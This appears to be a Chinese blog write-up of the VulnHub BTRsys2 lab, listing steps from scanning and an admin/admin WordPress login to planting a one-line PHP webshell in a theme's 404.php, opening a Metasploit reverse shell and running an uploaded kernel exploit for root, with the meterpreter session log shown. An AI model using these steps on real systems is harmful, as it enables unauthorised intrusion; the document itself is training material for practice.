BTRsys2

VulnHub靶機滲透之BTRsys2

1.信息收集 發現主機IP為192.168.65.132

2.nmap端口掃描nmap -T4 -A -v 192.168.65.132

3.訪問80端口 進行目錄掃描

4.訪問robots.txt 發現wordlist

5.login處嘗試弱密碼登陸 登陸成功(username=admin passwd=admin)

image-20210309233542575.png
image-20210309233553818.png

6.Posts處發現文件上傳 上傳失敗


7.appearance處發現editor 可編輯PHP



8.寫入一句話木馬 訪問http://192.168.65.132/wordpress/wp-content/themes/twentyfourteen/404.php 蟻劍連接成功


8.msf反彈shell


9.提權

9.1 查看當前系統信息



9.2查找內核漏洞




9.3 編譯上傳 提權成功
meterpreter > upload /home/kali/Desktop/exploit
[*] uploading  : /home/kali/Desktop/exploit -> exploit
[*] Uploaded -1.00 B of 23.22 KiB (-0.0%): /home/kali/Desktop/exploit -> exploit
[*] uploaded   : /home/kali/Desktop/exploit -> exploit
meterpreter > shell
Process 1286 created.
Channel 3 created.
pwd
/var/www/html/wordpress/wp-content/themes/twentyfourteen
ls -lh
total 832K
-rwxrwxrwx 1 btrisk       1000 1.1K Mar  9 08:40 404.php
-rw-r--r-- 1 www-data www-data  17K Mar  9 08:49 41458.c 
-rwxrwxrwx 1 btrisk       1000 2.2K Oct 12  2016 archive.php
-rwxrwxrwx 1 btrisk       1000 1.9K Oct 12  2016 author.php
-rwxrwxrwx 1 btrisk       1000 1.5K Oct 12  2016 category.php
-rwxrwxrwx 1 btrisk       1000 2.3K Oct 12  2016 comments.php
-rwxrwxrwx 1 btrisk       1000 2.2K Oct 12  2016 content-aside.php
-rwxrwxrwx 1 btrisk       1000 2.2K Oct 12  2016 content-audio.php
-rwxrwxrwx 1 btrisk       1000 1.1K Oct 12  2016 content-featured-post.php
-rwxrwxrwx 1 btrisk       1000 2.2K Oct 12  2016 content-gallery.php
-rwxrwxrwx 1 btrisk       1000 2.2K Oct 12  2016 content-image.php
-rwxrwxrwx 1 btrisk       1000 2.2K Oct 12  2016 content-link.php
-rwxrwxrwx 1 btrisk       1000  961 Oct 12  2016 content-none.php
-rwxrwxrwx 1 btrisk       1000  871 Oct 12  2016 content-page.php
-rwxrwxrwx 1 btrisk       1000 2.2K Oct 12  2016 content-quote.php
-rwxrwxrwx 1 btrisk       1000 2.2K Oct 12  2016 content-video.php
-rwxrwxrwx 1 btrisk       1000 2.2K Oct 12  2016 content.php
drwxrwxrwx 2 btrisk       1000 4.0K Apr 24  2017 css
-rw-r--r-- 1 www-data www-data  24K Mar  9 08:59 exploit
-rwxrwxrwx 1 btrisk       1000  946 Oct 12  2016 featured-content.php
-rwxrwxrwx 1 btrisk       1000  728 Oct 12  2016 footer.php
-rwxrwxrwx 1 btrisk       1000  16K Oct 12  2016 functions.php
drwxrwxrwx 3 btrisk       1000 4.0K Apr 24  2017 genericons
-rwxrwxrwx 1 btrisk       1000 2.3K Oct 12  2016 header.php
-rwxrwxrwx 1 btrisk       1000 2.6K Oct 12  2016 image.php
drwxrwxrwx 2 btrisk       1000 4.0K Apr 24  2017 images
drwxrwxrwx 2 btrisk       1000 4.0K Apr 24  2017 inc
-rwxrwxrwx 1 btrisk       1000 1.6K Oct 12  2016 index.php
drwxrwxrwx 2 btrisk       1000 4.0K Apr 24  2017 js
drwxrwxrwx 2 btrisk       1000 4.0K Apr 24  2017 languages
drwxrwxrwx 2 btrisk       1000 4.0K Apr 28  2017 page-templates
-rwxrwxrwx 1 btrisk       1000 1.2K Oct 12  2016 page.php
-rwxrwxrwx 1 btrisk       1000  16K Oct 12  2016 rtl.css
-rwxrwxrwx 1 btrisk       1000 603K Oct 12  2016 screenshot.png
-rwxrwxrwx 1 btrisk       1000 1.3K Oct 12  2016 search.php
-rwxrwxrwx 1 btrisk       1000  340 Oct 12  2016 sidebar-content.php
-rwxrwxrwx 1 btrisk       1000  395 Oct 12  2016 sidebar-footer.php
-rwxrwxrwx 1 btrisk       1000  848 Oct 12  2016 sidebar.php
-rwxrwxrwx 1 btrisk       1000 1.1K Oct 12  2016 single.php
-rwxrwxrwx 1 btrisk       1000 5.6K Mar  7 21:36 style.css
-rwxrwxrwx 1 btrisk       1000 1.6K Oct 12  2016 tag.php
-rwxrwxrwx 1 btrisk       1000 2.4K Oct 12  2016 taxonomy-post_format.php
chmod 777 exp*
./exp*
bash: cannot set terminal process group (840): Inappropriate ioctl for device
bash: no job control in this shell
root@ubuntu:/var/www/html/wordpress/wp-content/themes/twentyfourteen# 
?著作權歸作者所有,轉載或內容合作請聯系作者
平臺聲明:文章內容(如有圖片或視頻亦包括在內)由作者上傳并發布,文章內容僅代表作者本人觀點,簡書系信息發布平臺,僅提供信息存儲服務。

推薦閱讀更多精彩內容